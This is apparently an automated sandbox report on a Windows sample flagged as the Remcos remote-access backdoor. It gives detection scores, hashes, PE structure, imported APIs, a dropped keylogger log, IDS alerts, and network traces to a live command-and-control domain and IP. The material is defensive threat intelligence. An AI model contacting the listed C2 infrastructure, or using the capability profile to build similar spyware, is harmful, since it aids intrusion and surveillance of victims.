1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe | 71% | ReversingLabs | Win32.Backdoor.Remcos
1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe | 65% | Virustotal |
1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe | 100% | Avira | BDS/Backdoor.Gen
1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe | 100% | Joe Sandbox ML |
No Antivirus matches
No Antivirus matches
No Antivirus matches
Source | Detection | Scanner | Label
juanosorio.loseyourip.com | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
geoplugin.net | 178.237.33.50 | true | false | | high
juanosorio.loseyourip.com | 179.15.136.6 | true | true | | unknown
Name | Malicious | Antivirus Detection | Reputation
http://geoplugin.net/json.gp | false | | high
juanosorio.loseyourip.com | true | Avira URL Cloud: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://geoplugin.net/json.gpc | 1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe, 00000001.00000002.3753451865.0000000000671000.00000004.00000020.00020000.00000000.sdmp, 1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe, 00000001.00000003.1335196684.0000000000671000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://geoplugin.net/json.gpx | 1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe, 00000001.00000002.3753451865.0000000000671000.00000004.00000020.00020000.00000000.sdmp, 1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe, 00000001.00000003.1335196684.0000000000671000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://geoplugin.net/json.gpu | 1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe, 00000001.00000002.3753451865.0000000000671000.00000004.00000020.00020000.00000000.sdmp, 1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe, 00000001.00000003.1335196684.0000000000671000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://geoplugin.net/json.gp/C | 1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe | false | | high
http://geoplugin.net/json.gpn.net/ | 1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe, 00000001.00000002.3753451865.000000000062E000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://geoplugin.net/WZ | 1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe, 00000001.00000003.1335196684.0000000000692000.00000004.00000020.00020000.00000000.sdmp | false | | high
IP | Domain | Country | ASN | ASN Name | Malicious
179.15.136.6 | juanosorio.loseyourip.com | Colombia | 27831 | ColombiaMovilCO | true
178.237.33.50 | geoplugin.net | Netherlands | 8455 | ATOM86-ASATOM86NL | false
                                            Joe Sandbox version:42.0.0 Malachite
                                            Analysis ID:1587333
                                            Start date and time:2025-01-10 07:49:12 +01:00
                                            Joe Sandbox product:CloudBasic
                                            Overall analysis duration:0h 6m 52s
                                            Hypervisor based Inspection enabled:false
                                            Report type:full
                                            Cookbook file name:default.jbs
                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                            Number of analysed new started processes analysed:8
                                            Number of new started drivers analysed:0
                                            Number of existing processes analysed:0
                                            Number of existing drivers analysed:0
                                            Number of injected processes analysed:0
                                            Technologies:
                                            • HCA enabled
                                            • EGA enabled
                                            • AMSI enabled
                                            Analysis Mode:default
                                            Analysis stop reason:Timeout
                                            Sample name:1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe
                                            Detection:MAL
                                            Classification:mal100.rans.troj.spyw.expl.evad.winEXE@1/2@2/2
                                            EGA Information:
                                            • Successful, ratio: 100%
                                            HCA Information:
                                            • Successful, ratio: 100%
                                            • Number of executed functions: 37
                                            • Number of non-executed functions: 206
                                            Cookbook Comments:
                                            • Found application associated with file extension: .exe
                                            • Override analysis time to 240s for sample files taking high CPU consumption
                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
                                            • Excluded IPs from analysis (whitelisted): 13.107.246.45, 52.149.20.212
                                            • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; report is missing behavior information
                                            • Report size getting too big, too many NtQueryValueKey calls found.
Time      Type             Description
03:03:31  API Interceptor  8139063x Sleep call for process: 1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe modified
                                                        Process:C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):144
                                                        Entropy (8bit):3.3319169319867985
                                                        Encrypted:false
                                                        SSDEEP:3:rglsOlfVlOA4ql55JWRal2Jl+7R0DAlBG45klovDl6v:Mls6yql55YcIeeDAlOWAv
                                                        MD5:CB7983E197CABD7C201A6CC24DEE191B
                                                        SHA1:D33FAA2EDBE5E96423F9942F161DB6C2C82B7C30
                                                        SHA-256:D59DE7C2A25A34A3AF0734BA0AEF126FDB7DA6A9FEAABEFA5560B104D0C27F64
                                                        SHA-512:0B5856BDB05FEE11873984D26DDDF0BAF3B0AD342406A66E2AE054F28A48E89BFA9EC3FF03695B459657AEAD8B0294157FC42D7983A5E89A5CFF2A78E4F70C18
                                                        Malicious:true
                                                        Yara Hits:
                                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\ProgramData\remcos\logs.dat, Author: Joe Security
                                                        Reputation:low
                                                        Preview:....[.2.0.2.5./.0.1./.1.0. .0.1.:.5.0.:.1.6. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....
                                                        Process:C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe
                                                        File Type:JSON data
                                                        Category:dropped
                                                        Size (bytes):963
                                                        Entropy (8bit):5.019205124979377
                                                        Encrypted:false
                                                        SSDEEP:12:tkluWJmnd6UGkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zzkk:qlupdVauKyGX85jvXhNlT3/7AcV9Wro
                                                        MD5:B62617530A8532F9AECAA939B6AB93BB
                                                        SHA1:E4DE9E9838052597EB2A5B363654C737BA1E6A66
                                                        SHA-256:508F952EF83C41861ECD44FB821F7BB73535BFF89F54D54C3549127DCA004E70
                                                        SHA-512:A0B385593B721313130CF14182F3B6EE5FF29D2A36FED99139FA2EE838002DFEEC83285DEDEAE437A53D053FCC631AEAD001D3E804386211BBA2F174134EA70D
                                                        Malicious:false
                                                        Reputation:moderate, very likely benign file
                                                        Preview:{. "geoplugin_request":"8.46.123.189",. "geoplugin_status":200,. "geoplugin_delay":"2ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"New York",. "geoplugin_region":"New York",. "geoplugin_regionCode":"NY",. "geoplugin_regionName":"New York",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"501",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"40.7123",. "geoplugin_longitude":"-74.0068",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}
                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                        Entropy (8bit):6.589339009830499
                                                        TrID:
                                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                        • DOS Executable Generic (2002/1) 0.02%
                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                        File name:1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe
                                                        File size:493'568 bytes
                                                        MD5:90bf80022402e68248981833dcfacde0
                                                        SHA1:60b5b5973c52ed76af313681a6c24f264b88a3b4
                                                        SHA256:be4f15c4e0df6828dfcb3b91b22e77558bd02cb49afdd6089ff846651c5c6e98
                                                        SHA512:354d85990fe5fc45929f4f1a13d18de20004f4387708526b62533c8af2a30df1763e4f27e73e9566f8373915430045849bf5d36856142fbae4f4c60abded2225
                                                        SSDEEP:12288:913ak/mBXTG4/1v08KI7ZnMEF76JqmsvZQwS:Xak/mBXTV/R0nEF76gFZH
                                                        TLSH:7BA4BF01BAD2C072D57654300C3AE775DEBDBD212839897BB3D61D97FD30190A63AAB2
                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........)...H...H...H....(..H....*..H....+..H...0]..H..&....H... ...H... ...H... ...H...0J..H...H...I...!...H...!&..H...!...H..Rich.H.
                                                        Icon Hash:95694d05214c1b33
                                                        Entrypoint:0x433d45
                                                        Entrypoint Section:.text
                                                        Digitally signed:false
                                                        Imagebase:0x400000
                                                        Subsystem:windows gui
                                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                        DLL Characteristics:TERMINAL_SERVER_AWARE
                                                        Time Stamp:0x677C5D61 [Mon Jan 6 22:46:57 2025 UTC]
                                                        TLS Callbacks:
                                                        CLR (.Net) Version:
                                                        OS Version Major:5
                                                        OS Version Minor:1
                                                        File Version Major:5
                                                        File Version Minor:1
                                                        Subsystem Version Major:5
                                                        Subsystem Version Minor:1
                                                        Import Hash:e77512f955eaf60ccff45e02d69234de
                                                        Instruction
                                                        call 00007F345CCBE628h
                                                        jmp 00007F345CCBDF7Fh
                                                        push ebp
                                                        mov ebp, esp
                                                        sub esp, 00000324h
                                                        push ebx
                                                        push 00000017h
                                                        call 00007F345CCE045Eh
                                                        test eax, eax
                                                        je 00007F345CCBE107h
                                                        mov ecx, dword ptr [ebp+08h]
                                                        int 29h
                                                        push 00000003h
                                                        call 00007F345CCBE2C4h
                                                        mov dword ptr [esp], 000002CCh
                                                        lea eax, dword ptr [ebp-00000324h]
                                                        push 00000000h
                                                        push eax
                                                        call 00007F345CCC05E0h
                                                        add esp, 0Ch
                                                        mov dword ptr [ebp-00000274h], eax
                                                        mov dword ptr [ebp-00000278h], ecx
                                                        mov dword ptr [ebp-0000027Ch], edx
                                                        mov dword ptr [ebp-00000280h], ebx
                                                        mov dword ptr [ebp-00000284h], esi
                                                        mov dword ptr [ebp-00000288h], edi
                                                        mov word ptr [ebp-0000025Ch], ss
                                                        mov word ptr [ebp-00000268h], cs
                                                        mov word ptr [ebp-0000028Ch], ds
                                                        mov word ptr [ebp-00000290h], es
                                                        mov word ptr [ebp-00000294h], fs
                                                        mov word ptr [ebp-00000298h], gs
                                                        pushfd
                                                        pop dword ptr [ebp-00000264h]
                                                        mov eax, dword ptr [ebp+04h]
                                                        mov dword ptr [ebp-0000026Ch], eax
                                                        lea eax, dword ptr [ebp+04h]
                                                        mov dword ptr [ebp-00000260h], eax
                                                        mov dword ptr [ebp-00000324h], 00010001h
                                                        mov eax, dword ptr [eax-04h]
                                                        push 00000050h
                                                        mov dword ptr [ebp-00000270h], eax
                                                        lea eax, dword ptr [ebp-58h]
                                                        push 00000000h
                                                        push eax
                                                        call 00007F345CCC0556h
                                                        Programming Language:
                                                        • [C++] VS2008 SP1 build 30729
                                                        • [IMP] VS2008 SP1 build 30729
Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0x6f030          0x104         .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE        0x77000          0x4ad8        .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC       0x7c000          0x3b9c        .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG           0x6d520          0x38          .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x6d5f8          0x18          .rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x6d558          0x40          .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x58000          0x4f4         .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0              0x0
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
Name    Virtual Address  Virtual Size  Raw Size  MD5                               Xored PE  ZLIB Complexity      File Type  Entropy            Characteristics
.text   0x1000           0x5612d       0x56200   5c74fad187ce0ec180ec04ec1b2886cc  False     0.5738587400217707   data       6.626093338563234  IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata  0x58000          0x18b10       0x18c00   6a99ef6306230cc107eebd633ea523fe  False     0.49747474747474746  data       5.749671721823548  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data   0x71000          0x5d94        0xe00     f36050cd29c9ed45c5f5146a79631724  False     0.22712053571428573  data       3.113812036269812  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc   0x77000          0x4ad8        0x4c00    1658a70b29f2390ac934182ba33739b1  False     0.27765213815789475  data       3.979462869242048  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc  0x7c000          0x3b9c        0x3c00    1ed637208bbcc0435870762eae94c19a  False     0.759375             data       6.709901047445024  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name           RVA      Size    Type                                                                Language  Country        ZLIB Complexity
RT_ICON        0x7718c  0x468   Device independent bitmap graphic, 16 x 32 x 32, image size 1088    English   United States  0.3421985815602837
RT_ICON        0x775f4  0x988   Device independent bitmap graphic, 24 x 48 x 32, image size 2400    English   United States  0.27704918032786885
RT_ICON        0x77f7c  0x10a8  Device independent bitmap graphic, 32 x 64 x 32, image size 4224    English   United States  0.23686679174484052
RT_ICON        0x79024  0x25a8  Device independent bitmap graphic, 48 x 96 x 32, image size 9600    English   United States  0.22977178423236513
RT_RCDATA      0x7b5cc  0x4ca   data                                                                                         1.0089722675367048
RT_GROUP_ICON  0x7ba98  0x3e    data                                                                English   United States  0.8064516129032258
DLL           Import
KERNEL32.dll: ExpandEnvironmentStringsA, GetLongPathNameW, CopyFileW, GetLocaleInfoA, CreateToolhelp32Snapshot, Process32NextW, Process32FirstW, VirtualProtect, SetLastError, VirtualFree, VirtualAlloc, LoadLibraryA, GetNativeSystemInfo, HeapAlloc, GetProcessHeap, FreeLibrary, IsBadReadPtr, GetTempPathW, OpenProcess, OpenMutexA, lstrcatW, GetCurrentProcessId, GetTempFileNameW, GetSystemDirectoryA, GlobalAlloc, GlobalLock, GetTickCount, GlobalUnlock, WriteProcessMemory, ResumeThread, GetThreadContext, ReadProcessMemory, CreateProcessW, SetThreadContext, LocalAlloc, GlobalFree, MulDiv, SizeofResource, QueryDosDeviceW, FindFirstVolumeW, GetConsoleScreenBufferInfo, SetConsoleTextAttribute, lstrlenW, GetStdHandle, SetFilePointer, FindResourceA, LockResource, LoadResource, LocalFree, FindVolumeClose, GetVolumePathNamesForVolumeNameW, lstrcpyW, SetConsoleOutputCP, FormatMessageA, FindFirstFileA, AllocConsole, lstrcmpW, GetModuleFileNameA, lstrcpynA, QueryPerformanceFrequency, QueryPerformanceCounter, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSection, DeleteCriticalSection, HeapSize, WriteConsoleW, SetStdHandle, SetEnvironmentVariableW, SetEnvironmentVariableA, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineW, GetCommandLineA, GetOEMCP, IsValidCodePage, FindFirstFileExA, HeapReAlloc, ReadConsoleW, GetConsoleMode, GetConsoleCP, FlushFileBuffers, GetFileType, GetTimeZoneInformation, EnumSystemLocalesW, GetUserDefaultLCID, IsValidLocale, GetTimeFormatW, GetDateFormatW, GetACP, GetModuleHandleExW, MoveFileExW, LoadLibraryExW, RaiseException, RtlUnwind, GetCPInfo, GetStringTypeW, GetLocaleInfoW, LCMapStringW, CompareStringW, MultiByteToWideChar, DecodePointer, EncodePointer, TlsFree, TlsSetValue, GetFileSize, TerminateThread, GetLastError, GetModuleHandleA, RemoveDirectoryW, MoveFileW, SetFilePointerEx, CreateDirectoryW, GetLogicalDriveStringsA, DeleteFileW, FindNextFileA, DeleteFileA, SetFileAttributesW, GetFileAttributesW, FindClose, lstrlenA, GetDriveTypeA, FindNextFileW, GetFileSizeEx, FindFirstFileW, GetModuleHandleW, ExitProcess, GetProcAddress, CreateMutexA, GetCurrentProcess, CreateProcessA, PeekNamedPipe, CreatePipe, TerminateProcess, ReadFile, HeapFree, HeapCreate, CreateEventA, GetLocalTime, CreateThread, SetEvent, CreateEventW, WaitForSingleObject, Sleep, GetModuleFileNameW, CloseHandle, ExitThread, CreateFileW, WriteFile, FindNextVolumeW, TlsGetValue, TlsAlloc, SwitchToThread, WideCharToMultiByte, InitializeSListHead, GetSystemTimeAsFileTime, GetCurrentThreadId, IsProcessorFeaturePresent, GetStartupInfoW, SetUnhandledExceptionFilter, UnhandledExceptionFilter, IsDebuggerPresent, WaitForSingleObjectEx, ResetEvent, InitializeCriticalSectionAndSpinCount, SetEndOfFile
USER32.dll:   DefWindowProcA, TranslateMessage, DispatchMessageA, GetMessageA, GetWindowTextW, wsprintfW, GetClipboardData, UnhookWindowsHookEx, GetForegroundWindow, ToUnicodeEx, GetKeyboardLayout, SetWindowsHookExA, CloseClipboard, OpenClipboard, GetKeyboardState, CallNextHookEx, GetKeyboardLayoutNameA, GetKeyState, GetWindowTextLengthW, GetWindowThreadProcessId, SetForegroundWindow, SetClipboardData, EnumWindows, ExitWindowsEx, EmptyClipboard, ShowWindow, SetWindowTextW, MessageBoxW, IsWindowVisible, CreateWindowExA, SendInput, EnumDisplaySettingsW, mouse_event, MapVirtualKeyA, TrackPopupMenu, CreatePopupMenu, AppendMenuA, RegisterClassExA, GetCursorPos, SystemParametersInfoW, GetIconInfo, GetSystemMetrics, CloseWindow, DrawIcon
GDI32.dll:    BitBlt, CreateCompatibleBitmap, CreateCompatibleDC, StretchBlt, GetDIBits, DeleteDC, DeleteObject, CreateDCA, GetObjectA, SelectObject
ADVAPI32.dll: LookupPrivilegeValueA, CryptAcquireContextA, CryptGenRandom, CryptReleaseContext, GetUserNameW, RegEnumKeyExA, QueryServiceStatus, CloseServiceHandle, OpenSCManagerW, OpenSCManagerA, ControlService, StartServiceW, QueryServiceConfigW, ChangeServiceConfigW, OpenServiceW, EnumServicesStatusW, AdjustTokenPrivileges, RegDeleteKeyA, OpenProcessToken, RegCreateKeyA, RegCloseKey, RegQueryInfoKeyW, RegQueryValueExA, RegCreateKeyExW, RegEnumKeyExW, RegSetValueExW, RegSetValueExA, RegOpenKeyExA, RegOpenKeyExW, RegCreateKeyW, RegDeleteValueW, RegEnumValueW, RegQueryValueExW
SHELL32.dll:  ShellExecuteExA, Shell_NotifyIconA, ExtractIconA, ShellExecuteW
ole32.dll:    CoInitializeEx, CoGetObject, CoUninitialize
SHLWAPI.dll:  StrToIntA, PathFileExistsW, PathFileExistsA
WINMM.dll:    mciSendStringA, mciSendStringW, waveInClose, waveInStop, waveInStart, waveInUnprepareHeader, waveInOpen, waveInAddBuffer, waveInPrepareHeader, PlaySoundW
WS2_32.dll:   send, WSAStartup, socket, connect, WSAGetLastError, recv, closesocket, inet_ntoa, htons, htonl, getservbyname, ntohs, getservbyport, gethostbyaddr, inet_addr, WSASetLastError, gethostbyname
urlmon.dll:   URLOpenBlockingStreamW, URLDownloadToFileW
gdiplus.dll:  GdipAlloc, GdiplusStartup, GdipGetImageEncoders, GdipLoadImageFromStream, GdipSaveImageToStream, GdipGetImageEncodersSize, GdipFree, GdipDisposeImage, GdipCloneImage
                                                        WININET.dllInternetOpenUrlW, InternetOpenW, InternetCloseHandle, InternetReadFile
Language of compilation system | Country where language is spoken | Map
English | United States | (map image not extracted)
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2025-01-10T07:50:16.779873+0100 | 2834937 | ETPRO MALWARE Observed DNS Query to Abused DDNS (loseyourip .com) | 1 | 192.168.2.7 | 52907 | 1.1.1.1 | 53 | UDP
2025-01-10T07:50:17.643480+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.7 | 49704 | 179.15.136.6 | 1997 | TCP
2025-01-10T07:50:18.965560+0100 | 2803304 | ETPRO MALWARE Common Downloader Header Pattern HCa | 3 | 192.168.2.7 | 49706 | 178.237.33.50 | 80 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 10, 2025 07:50:16.951236963 CET | 49704 | 1997 | 192.168.2.7 | 179.15.136.6
Jan 10, 2025 07:50:16.956094980 CET | 1997 | 49704 | 179.15.136.6 | 192.168.2.7
Jan 10, 2025 07:50:16.956165075 CET | 49704 | 1997 | 192.168.2.7 | 179.15.136.6
Jan 10, 2025 07:50:16.961410999 CET | 49704 | 1997 | 192.168.2.7 | 179.15.136.6
Jan 10, 2025 07:50:16.966162920 CET | 1997 | 49704 | 179.15.136.6 | 192.168.2.7
Jan 10, 2025 07:50:17.593705893 CET | 1997 | 49704 | 179.15.136.6 | 192.168.2.7
Jan 10, 2025 07:50:17.643480062 CET | 49704 | 1997 | 192.168.2.7 | 179.15.136.6
Jan 10, 2025 07:50:17.723831892 CET | 1997 | 49704 | 179.15.136.6 | 192.168.2.7
Jan 10, 2025 07:50:17.727778912 CET | 49704 | 1997 | 192.168.2.7 | 179.15.136.6
Jan 10, 2025 07:50:17.733146906 CET | 1997 | 49704 | 179.15.136.6 | 192.168.2.7
Jan 10, 2025 07:50:17.733211994 CET | 49704 | 1997 | 192.168.2.7 | 179.15.136.6
Jan 10, 2025 07:50:17.738497972 CET | 1997 | 49704 | 179.15.136.6 | 192.168.2.7
Jan 10, 2025 07:50:18.049067974 CET | 1997 | 49704 | 179.15.136.6 | 192.168.2.7
Jan 10, 2025 07:50:18.050373077 CET | 49704 | 1997 | 192.168.2.7 | 179.15.136.6
Jan 10, 2025 07:50:18.055582047 CET | 1997 | 49704 | 179.15.136.6 | 192.168.2.7
Jan 10, 2025 07:50:18.185257912 CET | 1997 | 49704 | 179.15.136.6 | 192.168.2.7
Jan 10, 2025 07:50:18.237226963 CET | 49704 | 1997 | 192.168.2.7 | 179.15.136.6
Jan 10, 2025 07:50:18.340142965 CET | 49706 | 80 | 192.168.2.7 | 178.237.33.50
Jan 10, 2025 07:50:18.344952106 CET | 80 | 49706 | 178.237.33.50 | 192.168.2.7
Jan 10, 2025 07:50:18.345036030 CET | 49706 | 80 | 192.168.2.7 | 178.237.33.50
Jan 10, 2025 07:50:18.345216036 CET | 49706 | 80 | 192.168.2.7 | 178.237.33.50
Jan 10, 2025 07:50:18.350080013 CET | 80 | 49706 | 178.237.33.50 | 192.168.2.7
Jan 10, 2025 07:50:18.965486050 CET | 80 | 49706 | 178.237.33.50 | 192.168.2.7
Jan 10, 2025 07:50:18.965559959 CET | 49706 | 80 | 192.168.2.7 | 178.237.33.50
Jan 10, 2025 07:50:18.987709045 CET | 49704 | 1997 | 192.168.2.7 | 179.15.136.6
Jan 10, 2025 07:50:18.992671013 CET | 1997 | 49704 | 179.15.136.6 | 192.168.2.7
Jan 10, 2025 07:50:19.965866089 CET | 80 | 49706 | 178.237.33.50 | 192.168.2.7
Jan 10, 2025 07:50:19.970654011 CET | 49706 | 80 | 192.168.2.7 | 178.237.33.50
Jan 10, 2025 07:50:20.010272980 CET | 1997 | 49704 | 179.15.136.6 | 192.168.2.7
Jan 10, 2025 07:50:20.012303114 CET | 49704 | 1997 | 192.168.2.7 | 179.15.136.6
Jan 10, 2025 07:50:20.017144918 CET | 1997 | 49704 | 179.15.136.6 | 192.168.2.7
Jan 10, 2025 07:50:50.055286884 CET | 1997 | 49704 | 179.15.136.6 | 192.168.2.7
Jan 10, 2025 07:50:50.056847095 CET | 49704 | 1997 | 192.168.2.7 | 179.15.136.6
Jan 10, 2025 07:50:50.061719894 CET | 1997 | 49704 | 179.15.136.6 | 192.168.2.7
Jan 10, 2025 07:51:20.170331955 CET | 1997 | 49704 | 179.15.136.6 | 192.168.2.7
Jan 10, 2025 07:51:20.172291040 CET | 49704 | 1997 | 192.168.2.7 | 179.15.136.6
Jan 10, 2025 07:51:20.177161932 CET | 1997 | 49704 | 179.15.136.6 | 192.168.2.7
Jan 10, 2025 07:51:50.260201931 CET | 1997 | 49704 | 179.15.136.6 | 192.168.2.7
Jan 10, 2025 07:51:50.262659073 CET | 49704 | 1997 | 192.168.2.7 | 179.15.136.6
Jan 10, 2025 07:51:50.267477989 CET | 1997 | 49704 | 179.15.136.6 | 192.168.2.7
Jan 10, 2025 07:52:08.315974951 CET | 49706 | 80 | 192.168.2.7 | 178.237.33.50
Jan 10, 2025 07:52:08.722541094 CET | 49706 | 80 | 192.168.2.7 | 178.237.33.50
Jan 10, 2025 07:52:09.331444979 CET | 49706 | 80 | 192.168.2.7 | 178.237.33.50
Jan 10, 2025 07:52:10.534599066 CET | 49706 | 80 | 192.168.2.7 | 178.237.33.50
Jan 10, 2025 07:52:13.034718990 CET | 49706 | 80 | 192.168.2.7 | 178.237.33.50
Jan 10, 2025 07:52:18.035339117 CET | 49706 | 80 | 192.168.2.7 | 178.237.33.50
Jan 10, 2025 07:52:20.369019032 CET | 1997 | 49704 | 179.15.136.6 | 192.168.2.7
Jan 10, 2025 07:52:20.370125055 CET | 49704 | 1997 | 192.168.2.7 | 179.15.136.6
Jan 10, 2025 07:52:20.374911070 CET | 1997 | 49704 | 179.15.136.6 | 192.168.2.7
Jan 10, 2025 07:52:27.722043037 CET | 49706 | 80 | 192.168.2.7 | 178.237.33.50
Jan 10, 2025 07:52:50.473879099 CET | 1997 | 49704 | 179.15.136.6 | 192.168.2.7
Jan 10, 2025 07:52:50.475594044 CET | 49704 | 1997 | 192.168.2.7 | 179.15.136.6
Jan 10, 2025 07:52:50.480432034 CET | 1997 | 49704 | 179.15.136.6 | 192.168.2.7
Jan 10, 2025 07:53:20.588294983 CET | 1997 | 49704 | 179.15.136.6 | 192.168.2.7
Jan 10, 2025 07:53:20.589747906 CET | 49704 | 1997 | 192.168.2.7 | 179.15.136.6
Jan 10, 2025 07:53:20.594583988 CET | 1997 | 49704 | 179.15.136.6 | 192.168.2.7
Jan 10, 2025 07:53:50.643647909 CET | 1997 | 49704 | 179.15.136.6 | 192.168.2.7
Jan 10, 2025 07:53:50.645245075 CET | 49704 | 1997 | 192.168.2.7 | 179.15.136.6
Jan 10, 2025 07:53:50.650144100 CET | 1997 | 49704 | 179.15.136.6 | 192.168.2.7
Jan 10, 2025 07:54:20.778136015 CET | 1997 | 49704 | 179.15.136.6 | 192.168.2.7
Jan 10, 2025 07:54:20.838586092 CET | 49704 | 1997 | 192.168.2.7 | 179.15.136.6
Jan 10, 2025 07:54:20.843754053 CET | 1997 | 49704 | 179.15.136.6 | 192.168.2.7
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 10, 2025 07:50:16.779872894 CET | 52907 | 53 | 192.168.2.7 | 1.1.1.1
Jan 10, 2025 07:50:16.947993994 CET | 53 | 52907 | 1.1.1.1 | 192.168.2.7
Jan 10, 2025 07:50:18.329197884 CET | 58245 | 53 | 192.168.2.7 | 1.1.1.1
Jan 10, 2025 07:50:18.336433887 CET | 53 | 58245 | 1.1.1.1 | 192.168.2.7
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jan 10, 2025 07:50:16.779872894 CET | 192.168.2.7 | 1.1.1.1 | 0xead8 | Standard query (0) | juanosorio.loseyourip.com | A (IP address) | IN (0x0001) | false
Jan 10, 2025 07:50:18.329197884 CET | 192.168.2.7 | 1.1.1.1 | 0x6180 | Standard query (0) | geoplugin.net | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
